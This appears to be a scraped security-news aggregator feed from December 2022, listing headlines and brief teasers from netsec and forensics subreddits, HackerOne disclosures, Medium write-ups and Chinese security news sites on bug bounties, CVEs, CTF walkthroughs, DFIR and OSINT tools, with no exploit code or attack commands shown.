    SecWiki News 2022-12-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Index of /stuff/
    submitted by /u/taramj13 [link] [comments]
  • Open

    Exploiting API Framework Flexibility
    submitted by /u/6W99ocQnb8Zy17 [link] [comments]
    OSCP guide 2022
    Here is my personal guide for the current OSCP format (2022). All the advices you'll find here rewarded me a lot during my training. I hope my advices will be valuable to you. And I wish you guys a lot of luck in your journey English: https://sgtdede.gitbook.io/hacking/oscp-2022/guide-en French: https://sgtdede.gitbook.io/hacking/oscp-2022/guide-fr Note: I'll probably add some stuff to this guides in the next weeks Please let me know if you want me to answer specific questions or add some topics to this guide :) submitted by /u/sgtdede [link] [comments]
  • Open

    Email Verification Bypass Allows Users to Add & verify Any Email As Guardians Email
    Khan Academy disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1636552

  • Open

    Top Reasons Why Most Bug Bounty Hunters End Up Unpaid?
    Bug bounty hunters are individuals or groups who search for and report vulnerabilities in software and other systems for a monetary reward… Continue reading on Medium »
    Top 7 Tips to Succeed in Bug Bounty Programs
    Writing a technical write-up for a bug bounty program can be a daunting task, especially if you are new to the field of cybersecurity… Continue reading on Medium »
    CVE-2022-42710: A journey through XXE to Stored-XSS
    Hi everybody, I will share with you in this article in detail how I was able to find CVE-2022–42710 through static analysis Continue reading on InfoSec Write-ups »
    CVE-2022–42710: A journey through XXE to Stored-XSS
    Hi everybody, I will share with you in this article in detail how I was able to find CVE-2022–42710 through static analysis Continue reading on Medium »
    Simple CORS misconfig leads to disclose the sensitive token worth of $$$
    Hey fellow hacker’s and Bug hunters , Recently i found some weird CORS misconfiguration in one of my targets. Continue reading on Medium »
    IWCON2022 Networking Rooms Are Now Open + New Speaker Announcement
    Join in on some super cool infosec discussions from experts all over the world! Continue reading on InfoSec Write-ups »
    Bypass Admin Panel Using Google & fetch all Users Data [Data Breach]
    How i was able to bypass the admin panel using google dorks by having access to authenticated endpoints and access to all P1 user's info Continue reading on Medium »
    Param Hunting to Injections
    Hey hackers! How’s your week going? Continue reading on InfoSec Write-ups »
    XSS Stored on JD.id
    Hi Everyone, Continue reading on Medium »
    How to Succeed in Bug Bounty?
    Bug bounty programs are a popular way for organizations to identify and fix vulnerabilities in their systems. By offering rewards to… Continue reading on Medium »
    Sensitive Information Disclosure on bukalapak.com
    Hi Everyone, Continue reading on Medium »
  • Open

    NIST Retires SHA-1 Cryptographic Algorithm
    submitted by /u/OfftheTopRope [link] [comments]
    iCloud warrant returns
    Any suggestions on how to parse an iCloud warrant return (production folder) in oxygen. Ive used a couple of their preset options and havent been too happy with the resutls. Strictly for testing and comparison of the representation of the data. I normally use a combination of Physical Analzer and Axiom, testing out other tools at our disposal however. Any recommendations would be greatly appreciated. submitted by /u/arcticbluealex [link] [comments]
    What's the best DFIR investigation tool and why?
    There are tons of different ways to collect evidence but what's the best to use for analysis once the evidence is in place/collected and why? Edit: Seeing the first wave of answers I want to clarify my question. I am specifically asking about the investigation part - what do you use and recommend to use for putting together the case timeline and the report to send to the customer (in case you provide dfir as a service) etc. I've heard good things about Google Timesketch, but what are some of the others specially when your case spans multiple platforms? submitted by /u/texmex5 [link] [comments]
    External application usage of mobile photo picker
    Currently looking through Axiom at some images that have been opened. At 19:29:42 a new KnowledgeC application event occured with application name being: 'com.apple.mobileslideshow.photo-picker'. 19:30:01 file is accessed While I know this is the photos application. I am trying to figure out whether other applications have access to this photopicker intent. Or whether this confirms that the particular video the user has accessed was accessed through the internal photo library -the user has saved indecent media etc.. Potentially recieved these media through external applications such as Kik, Wickr, Twitter. My question is, if a user was to recieve a bunch of videos/photos in a single grouped message (So they are displayed in a tiled collage format) would it show up in logs as 'com.apple.mobileslideshow.photo-picker' ? or would they use their own method of viewing photos. ​ Thank you for any help and I do hope i explained it sufficiently. submitted by /u/National-Ad-7856 [link] [comments]
  • Open

    Group Policy settings command line struggles
    Hello. I am trying to enable/configure some edge settings via gpedit. I can open gpedit, and enable a setting, and I can see where it adds the registry key to do so. I am trying to automate these settings into a powershell script, so I figured if I add the same registry key gpedit adds, then I should be okay right? That does not seem to be the case. If I add the key the exact same way, gpedit shows that setting as still not configured. What am I doing wrong? I did try the Set-GPRegistryValue cmdlet too, just to see what would happen, but that gives me an error that the cmdlet does not exist. I was hoping just adding the correct registry key would work. Is there a way to fix this? Or if someone knows how to enable gpedit settings in powershell that would be useful as well. submitted by /u/BelugaBilliam [link] [comments]
    Risk of taking devices to Hong Kong
    I was reading through some posts about people travelling to China, the recommendations were to only bring burner phones, to keep them on person at all times. Is the security risk as big in HK as well? I'm gonna bring an old phone for daily use but would like to bring my regular phone to take pictures with, it has a good camera. I would keep it in airplane mode at all times. Is that a good idea or should I just leave it at home? submitted by /u/M4K1TK4 [link] [comments]
    Is there a working way to install unicornscan on a current Ubuntu distro?
    Due to some system issues im trying to avoid docker as well, but can try that as a last resort. submitted by /u/ChrisOSSTMM [link] [comments]
    WiFi on Airplanes
    I'm curious what other companies/security professionals recommend for enterprise users when they need to work on an airplane. Are there any other solutions/tips beyond utilizing a VPN to ensure maximum security while in the air? Thanks! submitted by /u/hogermite [link] [comments]
    Managing multiple passwords?
    Like pretty much everyone else on the planet, I have accumulated a vast number of logins, and like almost everybody else, I have re-used passwords. Although I use a password manager (Bitwarden), I still like to have at least some passwords I can remember, or at least easily type in. There are occasions when I've needed to manually enter a password, and for those times a short, but safe, password is preferable. I now have the issue that according to https://haveibeenpwned.com some of my passwords have been compromised - including some of those I use most often! I could use my password manager to simply create strong passwords for all my logins, which means none of them will be memorizable. At least, I can't remember "AC9mB#eR". I'm just wondering what I should do. I'm so used to my passwords, especially the pwned ones, so that changing them will be a wrench. And I know I should use different passwords for all my logins, but I'm loathe to do so ... What is the best balance between security and ease of use for managing multiple passwords? Is there a better manager than Bitwarden? submitted by /u/amca01 [link] [comments]
  • Open

    LFI at http://www.
    Sony disclosed a bug submitted by n0x496n: https://hackerone.com/reports/986380
    Sub-Domain Takeover at http://www.codefi.consensys.net/
    Consensys disclosed a bug submitted by krrish_hackk: https://hackerone.com/reports/1717626 - Bounty: $500
    Akismet API keys are exposed by authentication method
    Automattic disclosed a bug submitted by aaroncarson: https://hackerone.com/reports/1736846 - Bounty: $100
  • Open

    IWCON2022 Networking Rooms Are Now Open + New Speaker Announcement
    No content preview
    High Level Analysis of Custom Browsers
    No content preview
    Cyber Threat Intelligence (C.T.I)
    No content preview
    Getting Started with Reverse Engineering
    No content preview
    Using Threat Intelligence data to generate MISP alerts
    There are various Threat Intelligence sources that shares threat information with each other to help identify those threats in their… Continue reading on InfoSec Write-ups »
    Malware analysis
    No content preview
    Advent of Cyber 2022 [Day 15] Secure Coding | Santa is looking for a Sidekick | Simple Write up
    No content preview
    Param Hunting to Injections
    No content preview
    Only 24 Hours Left For IWCON2022
    No content preview
  • Open

    IWCON2022 Networking Rooms Are Now Open + New Speaker Announcement
    No content preview
    High Level Analysis of Custom Browsers
    No content preview
    Cyber Threat Intelligence (C.T.I)
    No content preview
    Getting Started with Reverse Engineering
    No content preview
    Using Threat Intelligence data to generate MISP alerts
    There are various Threat Intelligence sources that shares threat information with each other to help identify those threats in their… Continue reading on InfoSec Write-ups »
    Malware analysis
    No content preview
    Advent of Cyber 2022 [Day 15] Secure Coding | Santa is looking for a Sidekick | Simple Write up
    No content preview
    Param Hunting to Injections
    No content preview
    Only 24 Hours Left For IWCON2022
    No content preview
  • Open

    IWCON2022 Networking Rooms Are Now Open + New Speaker Announcement
    No content preview
    High Level Analysis of Custom Browsers
    No content preview
    Cyber Threat Intelligence (C.T.I)
    No content preview
    Getting Started with Reverse Engineering
    No content preview
    Using Threat Intelligence data to generate MISP alerts
    There are various Threat Intelligence sources that shares threat information with each other to help identify those threats in their… Continue reading on InfoSec Write-ups »
    Malware analysis
    No content preview
    Advent of Cyber 2022 [Day 15] Secure Coding | Santa is looking for a Sidekick | Simple Write up
    No content preview
    Param Hunting to Injections
    No content preview
    Only 24 Hours Left For IWCON2022
    No content preview
  • Open

    Red Teaming | A History
    Continue reading on Medium »
  • Open

    Vulnerability scanner written in Go that uses osv.dev data
    Article URL: https://github.com/google/osv-scanner Comments URL: https://news.ycombinator.com/item?id=34016188 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-12-16 Review
    DarkAngel: 一款全自动白帽漏洞扫描器 by 路人甲 Project Achilles:使用 RNN 对 Java 源代码进行静态漏洞检测的原型工具 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-16 Review
    DarkAngel: 一款全自动白帽漏洞扫描器 by 路人甲 Project Achilles:使用 RNN 对 Java 源代码进行静态漏洞检测的原型工具 by ourren 更多最新文章,请访问SecWiki
  • Open

    [NSFW] Went looking for some Jamie xx, xx. Some roody noody pics in the last 1.
    https://www.aquarius-publishing.com/RADIO/ https://dl2.beelody.com/Free/2021/ http://kadak.mrak.cz/ submitted by /u/ringofyre [link] [comments]
  • Open

    What Is XSS?
    Cross-Site Scripting (XSS) is a type of web security vulnerability that allows an attacker to inject malicious code into a website or web… Continue reading on Medium »
  • Open

    Build: an open source IDE for authoring, testing, and verifying production-ready security tests.
    submitted by /u/DH_Prelude [link] [comments]
    Critical Vulnerability Found in Sovrin, a Popular Decentralized Identity System
    submitted by /u/jat0369 [link] [comments]
    Foxit PDF Reader - Use after Free - Remote Code Execution Exploit
    submitted by /u/hacksysteam [link] [comments]
  • Open

    Fuzzing Weekly CW50: Understanding Fuzz Testing in Go
    Article URL: https://ioc.exchange/@FuzzingWeekly/109522672743186088 Comments URL: https://news.ycombinator.com/item?id=34012649 Points: 2 # Comments: 0
  • Open

    FreeBuf周报 |乌克兰政府网络被攻破; 国际乓联泄露数百名运动员护照信息
    我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    如何使用Klyda在线检测Web应用程序的密码喷射和字典攻击漏洞
    Klyda是一款功能强大的Web应用程序安全漏洞检测工具,可以帮助广大研究人员快速检测目标Web应用程序中是否存在基于凭证的攻击漏洞。
    第三方供应商数据泄漏,Gemini 客户恐遭钓鱼攻击
    Gemini 客户可能已经成为了网络钓鱼的攻击目标。
    Pylirt:一款功能强大的Linux事件响应工具套件
    Pylirt是一款针对Linux系统的网络安全事件应急响应工具套件,在该工具的帮助下,广大研究人员可以轻松收集目标Linux系统相关的各种信息。
    免费Web应用防火墙(南墙)使用介绍
    免费的web应用防火墙最出名的非ModSecurity莫属。然而ModSecurity存在易用性差、误报高、不够灵活等问题,今天给大家介绍一款免费好用的web应用防火墙-南墙。
    因安装木马化的Windows 10程序,乌克兰政府网络被攻破
    使用木马化的ISO在间谍行动中是新颖的,包括反侦测能力,表明这一活动背后的组织者有安全意识和耐心。
    FuboTV 称网络攻击导致世界杯流媒体中断
    美国东部时间14日下午2点,FuboTV 因遭到网络攻击,导致用户无法登录流媒体直播观看卡塔尔世界杯半决赛法国与摩洛哥的比赛。
    FBI的关基情报网站遭黑客攻击,数据库在暗网出售
    其数据库在暗网违规出售,内含8万多名知名私营部门成员的联系方式。
    15W人共聚多维时空,CIS 2022网安大会持续火热
    多维时空的落幕绝不是CIS 网络安全创新大会的结束,而是一个新的开始。
  • Open

    A Purge is Underway on Twitter
    Update: Overnight Musk was challenged by reporters on a Twitter space. What did Musk do? Leave the space and close Twitter Spaces of… Continue reading on Medium »

  • Open

    Conheça seu alvo — Web Recon
    # Tudo tem um começo!!! Continue reading on Medium »
    The Benefits of Implementing a Bug Bounty Program for Your Web App
    A bug bounty program is a crowdsourced approach to identifying and addressing security vulnerabilities in a web application Continue reading on Medium »
    How to create nuclei templates?
    Nuclei templates are a powerful feature of the Nuclei vulnerability scanning tool, which allows you to create custom templates for… Continue reading on Medium »
    10 Practical Recon & vulnerability Scanners for bug hunters (part two)
    Hello again friends, I’m Koroush (aka whiteOwl). I hope you enjoy the last part, in this part, I introduce you to several active recon… Continue reading on Medium »
    Payment Gateway Bypass on Government Domain.
    The vulnerability was found on the website which is used to pay Challan online to Ahmedabad Traffic Police. Continue reading on Medium »
    How to Informe an Organization about a Security Vulnerability
    Finding a new vulnerability is thrilling and might be beneficial depending on the vulnerability and company. However, identifying the… Continue reading on Bug Zero »
    Nmap : The Network Mapper for Free Security Scanning
    A free and open-source tool for network discovery and security auditing is called Nmap (“Network Mapper”). Continue reading on Bug Zero »
    The Necessity of Software Testing
    Software testing is an essential feature that affects the health and effectiveness of the software. It assures the trustworthiness of… Continue reading on Bug Zero »
    Lastpass Password Manager, Has Been Hacked, Again!
    What is LastPass? Continue reading on Bug Zero »
    The simplest way to install go lang ( Go Language )
    Hi friends 🙏, today we will see another / simplest way to install go lang (Recommended) on kali Linux. This article gives a step by step… Continue reading on Medium »
    How To Exploit File Inclusion Vulnerabilities: A Beginner’s Introduction. — StackZero
    In this article, we will be exploring the ins and outs of file inclusion vulnerability exploitation. Continue reading on InfoSec Write-ups »
  • Open

    PAI Research Process, part 2
    As Anthony D. states on LinkedIn, “Proper OSINT investigations require a methodical approach in order to protect the analyst and the… Continue reading on Medium »
    Gas Attack Writeup
    MISSION BRIEFING Continue reading on The Sleuth Sheet »
    TRYHACKME: Advent of Cyber 2022 [Day 3] -OSINT Nothing escapes detective McRed
    Scenario: As the elves are trying to recover the compromised santagift.shop website, elf Recon McRed is trying to figure out how it was… Continue reading on System Weakness »
    OSINT — Hunting Subdomains
    Listing Subdomains Continue reading on Medium »
    10 Practical Recon & vulnerability Scanners for bug hunters (part two)
    Hello again friends, I’m Koroush (aka whiteOwl). I hope you enjoy the last part, in this part, I introduce you to several active recon… Continue reading on Medium »
    Simple bot-trap in Telegram
    Our bot functionality will include a chatbot that mimics itself as any functional bot that generates a report in response to a user… Continue reading on Medium »
    OSINT — Пробив биткоин кошелька.
    Bitref — поможет проверить баланс любого биткоин-кошелька. Нужно только указать действительный адрес. Сервис используются только публичные… Continue reading on Medium »
  • Open

    What enterprise antivirus do you know that have autodeploy?
    Hi there, I'm interested in antivirus who have autodeploy for windows/macos/linux. And how this deploy is working? For example, McAfee have synchronization with AD and agent pushed for all new discovered devices, but windows, macos and linux must have pre-configured environment (opened appropriate ports, have connection to management system, etc). The problem is that synchronization is timed and new devices that appeared in the AD may not be online and the agent will not be installed. I want the antivirus to immediately deploy as soon as the machine is added to the AD (if technically possible) submitted by /u/athanielx [link] [comments]
    DLP Tool
    What's your take on DLP for endpoints & Network+CASB which one is doing good in the market with windows+mac laptops? submitted by /u/namesake112 [link] [comments]
    Realistically, what are the risks of sharing my IP?
    I'm hosting a server that sends and receives UDP packets and I want to share the IP so anybody can connect to it. The PC it's being hosted on has basically nothing on it, so there's no sensitive info, stored passwords, etc. on it, but there is on other PCs connected to the same router. I went into my router settings and opened the port in the port forwarding section, for the host machine's internal IP only, and all machines have network discovery turned off. I'm aware that DoS is a risk, but other than that, is there anything I need to be worried about? submitted by /u/Edward_Fingerhands [link] [comments]
    Reminder -- Free Webinar Tomorrow (Thursday) - TLS 1.3 and how it differs from previous versions of SSL/TLS
    https://www.reddit.com/r/AskNetsec/comments/zei9t1/free_live_webinar_tls_13_and_how_it_differs_from/ Just wanted to drop a quick reminder for folks in case you didn't see the initial thread... I had asked if this subreddit would be interested in a TLS 1.3 webinar, and people responded positively, therefore ... I'm offering a free live webinar tomorrow (Thursday) at 02:30p PST / 05:30p EST. I'll copy and paste the main details below, but more details are in the original thread. TLS 1.3 and how it differs from previous versions of SSL and TLS Thursday :: 12/15/2022 :: 02:30p PST / 05:30p EST Duration: 2 hours Agenda: 60-75~ minutes of lecture, with 3 breaks for Q&A followed by free for all Q&A on anything TLS/SSL related for the remainder of the session.   Topics I plan to cover: Old protocols no longer supported Simpler Cipher Suites Fewer Cipher Suites All TLS 1.3 Ciphers are AEAD Forward Secrecy Removed Custom DH Groups Shorter Handshake (One Round Trip) Most of the Handshake is Encrypted Client Certificate is Encrypted Many, Many more Session Keys Middleboxes - what they are, how they inhibited smooth TLS 1.3 transition For each topic I plan to describe how a feature worked in TLS 1.2 and prior, how it was broken, and how TLS 1.3 improved it. submitted by /u/erh_ [link] [comments]
  • Open

    Exposed Log File Lead to Full Internal path disclosure at [https://nextcloud.com/wp-content/debug.log]
    Nextcloud disclosed a bug submitted by 0x3bdo: https://hackerone.com/reports/1767439
    Firebase credentials leak
    MTN Group disclosed a bug submitted by jimmisimon: https://hackerone.com/reports/1691888
    [MK8DX] Improper verification of Competition creation allows to create "Official" competitions
    Nintendo disclosed a bug submitted by rambo6glaz: https://hackerone.com/reports/1653676 - Bounty: $577
  • Open

    Cellebrite UFD
    I've received an iPhone collection. It contains UFD file along with a zip file. Do I need Cellebrite Physical Analyzer in order to view the data? In previous instances I have received a reader alongside a report UFDR. submitted by /u/theedon323 [link] [comments]
    I'm halfway through my APFS Advent Challenge.
    submitted by /u/jtsylve [link] [comments]
    Pioneer car stereo is hacked. Factory reset does not erase this one number and it's presets.
    submitted by /u/AmIontheTrumanshow [link] [comments]
    WeChat extraction - Android devices
    Forensic collection of two android mobile devices, outsourced this to 2 different vendors in two different locations. The weapons in their arsenal are just UFED and Oxygen. Essentially, we need the “most complete” image from an android + absolutely essential that we capture WeChat. One vendor was able to get everything out, and the second one got no whatsapp and no WeChat. I’m just curious as i wasn’t on prem, and can’t comment on h o w the second vendor fudged up but (as i now am not involved in collections anymore) what would be YOUR way of going about this? Are there specific extraction methods in file system or AL that capture particular third party messaging applications? What can we do to make sure WeChat is not missed? Any past experiences? submitted by /u/greez__monkey [link] [comments]
  • Open

    Malware analysis
    Forensic McBlue to the REVscue! THM — aoc 2022 day 12 Continue reading on InfoSec Write-ups »
    Signature Evasion : tryhackme
    Using the knowledge gained throughout this task, split the binary found in C:\Users\Student\Desktop\Binaries\shell.exe using a native… Continue reading on Medium »
  • Open

    How Elon Musk Says He Catches Leakers at His Companies
    submitted by /u/moxofoxo [link] [comments]
    A vulnerability in the UMPD (User-Mode Printer Drivers) allows local users to trigger a use-after-free vulnerability. The vulnerability works from Windows 8 and above, and is fairly easy to exploit on older Windows machines.
    submitted by /u/SSDisclosure [link] [comments]
    SHA-1 is out. NIST recommends switching to the SHA-2 and SHA-3 groups of hash algorithms as soon as possible, with an official deadline of Dec. 31, 2030.
    submitted by /u/nist [link] [comments]
    Salt Labs | Missing Bricks: Finding Security Holes in LEGO APIs
    submitted by /u/ynvb [link] [comments]
    Unauthenticated Buffer Overflows in multiple Zyxel routers still haunting users - Metasploit exploit code published, thousands of devices potentially affected!
    submitted by /u/0x9000 [link] [comments]
    PyPI malware creators starting to employ Anti-Debug techniques
    submitted by /u/SRMish3 [link] [comments]
    BSidesSF 2023 Call For Presentations, Workshops, and Villages
    submitted by /u/reedloden [link] [comments]
    How NOT to patch Integer Overflow in JavaScript - Technical analysis of over 50 community submissions
    submitted by /u/pi3ch [link] [comments]
  • Open

    SecWiki News 2022-12-15 Review
    全量安全资产管理-进阶实践 by ourren 杀伤链视域下的算法战审思 by ourren EMS:试验数据驱动的高效变异模糊测试系统 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-15 Review
    全量安全资产管理-进阶实践 by ourren 杀伤链视域下的算法战审思 by ourren EMS:试验数据驱动的高效变异模糊测试系统 by ourren 更多最新文章,请访问SecWiki
  • Open

    Browser powered scanning 2.0
    It's been two years since we unleashed browser powered scanning on the world, and we decided what better way to celebrate than to start again from scratch! It started out as a task, how did it end up
  • Open

    Browser powered scanning 2.0
    It's been two years since we unleashed browser powered scanning on the world, and we decided what better way to celebrate than to start again from scratch! It started out as a task, how did it end up
  • Open

    Digging Inside Azure Functions: HyperV Is the Last Line of Defense
    We investigated Azure's serverless architecture and found that a HyperV VM was the remaining defense after a container breakout. The post Digging Inside Azure Functions: HyperV Is the Last Line of Defense appeared first on Unit 42.
  • Open

    Tryhackme: Simple CTF
    No content preview
    How To Exploit File Inclusion Vulnerabilities: A Beginner’s Introduction. — StackZero
    No content preview
  • Open

    Tryhackme: Simple CTF
    No content preview
    How To Exploit File Inclusion Vulnerabilities: A Beginner’s Introduction. — StackZero
    No content preview
  • Open

    Tryhackme: Simple CTF
    No content preview
    How To Exploit File Inclusion Vulnerabilities: A Beginner’s Introduction. — StackZero
    No content preview
  • Open

    5万个极端组织,非法物品2年12亿美元销售额,暗网数据令人震惊
    这份2022年暗网统计数据清单让我们深入了解暗网的威胁有多大,以及幕后可能发生的事情。
    FreeBuf早报 | 美参议院通过法案在政府设备上禁止TikTok;黑客已发布iOS16越狱工具
    该法案禁止联邦雇员在政府设备上下载或使用短视频应用 TikTok。该法案仍需在众议院通过并由总统签署才能成为法律。
    年末将至,高燃开战 | 2022年网安共建者荣誉之战开启!
    年度最强共建者角逐战一触即发,谁才是今年最强的「网安百科专家」?让我们拭目以待!
    国际乓联泄露数百名运动员护照和疫苗接种证书
    数百名乒乓球运动员的护照细节和疫苗接种证明等信息被泄露,其中包括中国运动员马龙和樊振东的信息。
    微软修补了用来传播勒索软件的 Windows 零日漏洞
    微软在最近的一次“星期二更新”中修复了一个备受关注的、编号为CVE-2022-44698的零日漏洞。
    新的 GoTrim 僵尸网络试图入侵 WordPress 网站的管理员帐户
    一个新的基于 Go 的僵尸网络被发现使用 WordPress 内容管理系统 (CMS) 扫描。
  • Open

    Exploiting SUID Binaries - Linux PrivEsc
    submitted by /u/Clement_Tino [link] [comments]
    Red-Teaming-Toolkit: This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
    submitted by /u/boutnaru [link] [comments]
  • Open

    How to Find XSS Like a Pro
    Thread 🧵:👇 Continue reading on Medium »
  • Open

    The Pacific War Online Encyclopedia left their directory wide open
    As the title suggests. Many images of ships, planes, troops, etc associated with the Pacific War efforts. Lots of old, historical photos. Did a local search of this sub for prior posts and came up blank, so added it. Directory of Images submitted by /u/BustaKode [link] [comments]
    How to figure out the size of a folder in an OD?
    I am using wget to download a folder, and I think I will have to leave my computer overnight to let it download fully. But, there is one concern I have: I dont know if I have enough storage rn for it. Is there any way to check the size of a folder? submitted by /u/KK_005 [link] [comments]
  • Open

    Wordfence launches free vulnerability database API and web interface
    Article URL: https://www.wordfence.com/threat-intel/ Comments URL: https://news.ycombinator.com/item?id=33992907 Points: 5 # Comments: 0

  • Open

    Business logic vulnerabilities
    Hi Guys, I consider myself bellow average when it comes to find Business logic vulnerabilities, and I want to improve in it. how do you deal with this kind of vulnerabilities?, what advises would you give to move forward? submitted by /u/Abofouad [link] [comments]
    CNA script testing/feedback
    Hi Teamers, Ive created a Cobalt Strike Aggressor (CNA) Script I've dubbed ipv4guard. As it's my first one ever and Im ever looking for feedback and testers (and contributors!! ;D) to maybe help to improve it. The script is for Cobalt Strike and per the blurb I wrote A Cobalt Strike Aggressor Script that aims to help prevent errant Cobalt Strike commands from being executed on non-whitelisted / off-limit / out-of-scope / unapproved IPv4 addresses. Ive done tested best I can but obviously cant by my lonesome put it into as much of a wider berth testing than the wider community. Cheers submitted by /u/savsaintsanta [link] [comments]
    Return to Sender - Detecting Kernel Exploits with eBPF
    submitted by /u/mdaverde [link] [comments]
    Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.
    submitted by /u/boutnaru [link] [comments]
  • Open

    ReDoS (Rails::Html::PermitScrubber.scrub_attribute)
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1804128 - Bounty: $4000
    Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)
    Ruby on Rails disclosed a bug submitted by 0b5cur17y: https://hackerone.com/reports/1656627
    Incomplete fix for CVE-2022-32209 (XSS in Rails::Html::Sanitizer under certain configurations)
    Ruby on Rails disclosed a bug submitted by 0b5cur17y: https://hackerone.com/reports/1654310
    Electron CVE-2022-35954 Delimiter Injection Vulnerability in exportVariable
    Internet Bug Bounty disclosed a bug submitted by theinternetofdefcon_: https://hackerone.com/reports/1787810 - Bounty: $2400
  • Open

    OSINT Tools
    GHunt — https://github.com/mxrch/GHunt Continue reading on Medium »
    InfoSecSherpa’s News Roundup for Wednesday, December 14, 2022
    InfoSecSherpa: Your Guide Up a Mountain of Information! Continue reading on Medium »
    Simply Telegram-channels OSINT tool…
    Let’s talk about a somewhat non-standard method of researching Telegram communities related to the study of published content. Continue reading on Medium »
    Can open-source tools help local newsrooms do video journalism?
    How reporters can use cellphone videos, satellite imagery, and other visual data to uncover local stories. Continue reading on JSK Class of 2023 »
    OSINT-Discovering Email Addresses
    Tools to discover emails - Hunter.io   - 100/50 Free searches - Phonebook.cz - Voilanorbert.com - Clearbit Connect (Gmail Extension) - To… Continue reading on Medium »
  • Open

    Cloning a larger hard drive to a smaller one?
    I created a forensic load for our systems, but all I had at the time was a 500gb SSD. I only used around 100gbs of that. I'd like to clone that onto a 256 in a forensically sound way but I'm not sure how. I know our TX1s won't clone it even if the bigger drive has less than 256gb of data. Is there a way to do this that's forensically sound or will I just have to make a from-scratch forensic load on a 256? submitted by /u/Sandyblanders [link] [comments]
    A Deep Dive into BianLian Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Is there a way to track a user copying data from a USB drive? For example, Computer A has a connected USB drive, the user turns off Computer A, connect the USB drive to Computer B to copy data, and return USB to Computer A. How can we prove data was copied from the USB drive?
    Right now it looks like the user is just copying data from Computer A to the USB drive. However, I think the the user is copying data to a non-company computer and returning the USB drive. How can we prove data was copied from the USB drive to another computer? Thanks. submitted by /u/Past_Programmer [link] [comments]
  • Open

    Driver HackTheBox Walkthrough
    Introduction The driver is an easy-rated Windows box on the HackTheBox platform. This is designed to understand initial exploitation using an SCF file and further The post Driver HackTheBox Walkthrough appeared first on Hacking Articles.
    Driver HackTheBox Walkthrough
    Introduction The driver is an easy-rated Windows box on the HackTheBox platform. This is designed to understand initial exploitation using an SCF file and further The post Driver HackTheBox Walkthrough appeared first on Hacking Articles.
  • Open

    MITRE TTP mapping to NIST 80037 Threat Events
    Is anyone aware of any mapping between the MITRE TTPs and the NIST 800-37 Threat Events? E.g. Threat Event x is applicable to the following TTPs: TA1 = TTPs 1,3&5 TA2 = TTPs 1,2,3 … and so on. submitted by /u/EmergencyShow [link] [comments]
    Understanding etc/hosts and C&C
    "Bad actors will commonly change the etc/hosts file for C&C reasons" Could someone explain the technical part of how this works? I understand that creating a google.com entry with a malicious IP in etc/hosts will cause the google.com visit to be a malicious website, however I'm having a hard time understanding how a botnet communicates with the C&C server here. Thanks! submitted by /u/Jaruki_Jurakami [link] [comments]
    Helpdesk/SysAdmin/NetAdmin or Software Engineer for starting ?
    I'm 22 and I haven't Degree or Diploma, I finish computer high school in 3 years. This course is for adult who dropped out studies in adolescence. I am undecided whether to start as a Helpdesk/SysAdmind/NetworkAdmin or as a developer... My long term goal is Cybersecurity but first I wanted to get some experience in IT... What do you recommend me between the two ? What is more valuable certs for Europe about Networking and Sysadmin Linux ? I heard that CompTIA certs are more considered in US and not in Europe submitted by /u/HelloWorldCLang [link] [comments]
    What does TIKTOK actually do that is so bad?
    I am curious. Is TikTok worse that the other hundred apps I have on my phone? I installed a firewall logger on my android phone and it saw things like ETSY app sending messages to facebook when I was not even running the etsy app and had not run it for months. Another app showing the phases of the moon was trying to send messages when I have not run that app for over 6 months. It looks to my like everything on my phone is trying to spy on me. What does the tiktok app do that makes it worse then the rest of these apps? submitted by /u/GreenAlien10 [link] [comments]
    How realistic is the threat?
    So lets say you want to print off some sensitive documents. Public printers are likely to have hard drives that contain copies of the printed documents, though I have no idea whether these commonly overwrite data or anything related to that. I'm wondering whether it's likely that someone is actually looking at these drives and pulling off data of interest. I can imagine some library technician randomly connecting to printers and pulling off financial data and whatnot that people are printing and trying to steal money. But when I was an IT tech that wasn't really in my knowledge bank, I didn't even know they had HDD's much less know how to access them for that purpose as my job was just to fix them at a basic level. I don't know if most big brand corporate printers have apps that allow people to pull this data off or would the drive have to be pulled manually and connected to another system to access the files, how likely is this ever to happen at a public place like a library or a printing store? Does it make more sense to go somewhere a lot of people go in the hope that by the time anyone goes looking your documents would have been over-written or somewhere with less use so it's less likely anyone would have a reason to look? submitted by /u/sephstorm [link] [comments]
    BurpSuite intercept host filter
    Hi everyone, I hope you are having a great day. I wish to intercept only HTTP request into a certain host in BurpSuite (community). How can I do that? Thanks in advance! submitted by /u/Far_Lifeguard_3262 [link] [comments]
    Is there any way to automatically detect whether a website is using a cookie banner or not?
    Hey everyone, I am not sure if this is the correct subreddit ( please suggest a better one if there is one), but we are working on analyzing the cookie used by a website and privacy consent. As the first step, we want to detect whether the website uses a cookie banner or not using a script. My initial idea is to do HTML scraping and look for strings like 'We use cookies to enhance your browsing experience, serve personalized ads or content, and analyze our traffic. By clicking "Accept All", you consent to our use of cookies.' Is there any better way one can do this? I know there is __cmp function under GDPR, but not a lot of websites use this. Any other way one can approach this problem? submitted by /u/proudsubiii [link] [comments]
    Compromised machine with remote logon in app, but nothing in rdp?
    Hey boys and girls ​ Got a odd one here where a machine got popped, and there is logon type 3 in Security logs. but rdp and terminal service logs shows nothing for those dates. What is going on? submitted by /u/ThePorko [link] [comments]
  • Open

    How i found an OpenRedirect Vulnerability in Our University Website
    Hello Curious Hackers, This is my First WriteUp bout “ How i found an OpenRedirect Vulnerability in Our University Website !!! “. Continue reading on Medium »
    How To Handle A Bug Bounty Program Internally
    Most businesses are not prepared to provide public bug bounties because they lack the necessary procedures, have too many vulnerabilities… Continue reading on Medium »
    Privilege escalation leads to deleting other user’s account and company Workspace [Access Control]
    Dear Folks! Continue reading on Medium »
  • Open

    CVE-2022-27518: Unauthenticated RCE in Citrix ADC and Gateway
